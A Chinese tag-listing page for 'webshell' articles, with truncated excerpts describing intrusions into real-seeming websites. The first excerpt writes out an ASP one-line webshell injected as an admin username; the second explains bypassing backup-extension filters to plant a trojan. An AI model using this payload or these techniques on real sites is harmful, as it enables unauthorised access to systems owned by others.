首页 »标签 » 什么是webshell » 列表
、起因今天半夜无聊不小心弄看了以前想弄站www.***818.com试试了默认数据库http://www.***818.com/abc.asp,居然是没防下(以前可能被人家搞过直下载不了老提示今天可以下可能是管理员重新传数据库上去了-----------我得到和他样并且可能是个人开www.***918.com代码)于是呼我就以为可以写马进后台添加用户那里加个用户名为<%execute request("l")%> 密码aaa用户试传大马但是失败就这样开始了我夜生活(本来可以在其他地方插但由于我不小心)
2、分析前面罗嗦了点下面简洁说:重新看下数据库用户名那里居然只给 [阅读全文] [PDF]
今天个站上朋友给个网站WebSite拿到了用户和密码;是个BBSXP论坛进后台还发现居然有数据库控制先项以为只不为是几分种事情他还叫我定要教他搞备份木马好久没弄了应该这个是比较简单他是个小菜黑黑东西比较多质量不如何样不过这个东西应该会吧不过看他模样还是去看了下
直接在前台发帖传附件老思路方法发现后台备份时出现数据库不能出现ASP等字样这时候差点被他说有关 asp后面加空格所诱导...
其实像这样情况只要把然后备份成ASP格式改成ASA格式或者...其它非ASP格式就可以例如1如果空间支持CGI2例如空间支持PHP3例如空间支持jsp4总定会支持HTML吧?只要这段HTML代码里面含通用上传 [阅读全文] [PDF]
-------------------------------------------------------------------------------- Shell是种具备特殊功能它是介于使用者和 UNIX/Linux 操作系统的核心(kernel)间个接口为什么我们说 shell 是种介于系统核心和使用者间中介者呢?读过操作系统概论读者们都知道操作系统是个系统资源管理者和分配者当您有需求时您得向系统提出;从操作系统角度来看它也必须防止使用者 [阅读全文] [PDF]
1 共3条 分1页
- 防范sql注入攻击:斩断注入黑手  防范IE漏洞攻击
- hidden:Hidden型参数变量未过滤导致的上传漏洞利用一则
- 跨站脚本:小心字符集导致的浏览器跨站脚本攻击
- tcptrack:窍门技巧的对付黑客用  Tcptrack跟踪  TCP连接
- Web黑客工具箱:DOM查看器的使用介绍
- 认识Sinowal木马  保护网络信息安全
- 黑客基地:警惕网络黑手  让无线网络远离黑客入侵
- ddos攻击:利用反弹技术进行DDoS攻击的分析
- 躲避非法入侵不做黑客肉鸡的 7招
- foxmail6.0:Foxmail  6.0  防范黑客攻击窍门技巧两招
- php168漏洞:Php168  v2008  权限提升漏洞
- 53kf客服系统:53KF在线客服系统XSS漏洞
- 窝内网:域内网中的信息收集的一内网结构的探测
- 跨站攻击:利用跨站请求伪造攻击本地网络设备
- 脚本注入:剑走偏锋的灵巧的脚本注入方式
- 跨站脚本攻击:谈跨站脚本攻击和防御
- php提权:php注射后的提权
- 添加系统服务:手工添加后门中的系统服务
- 网页不能复制:破解一些网页不能复制的思路方法
- byshell:粉碎内核级Byshell木马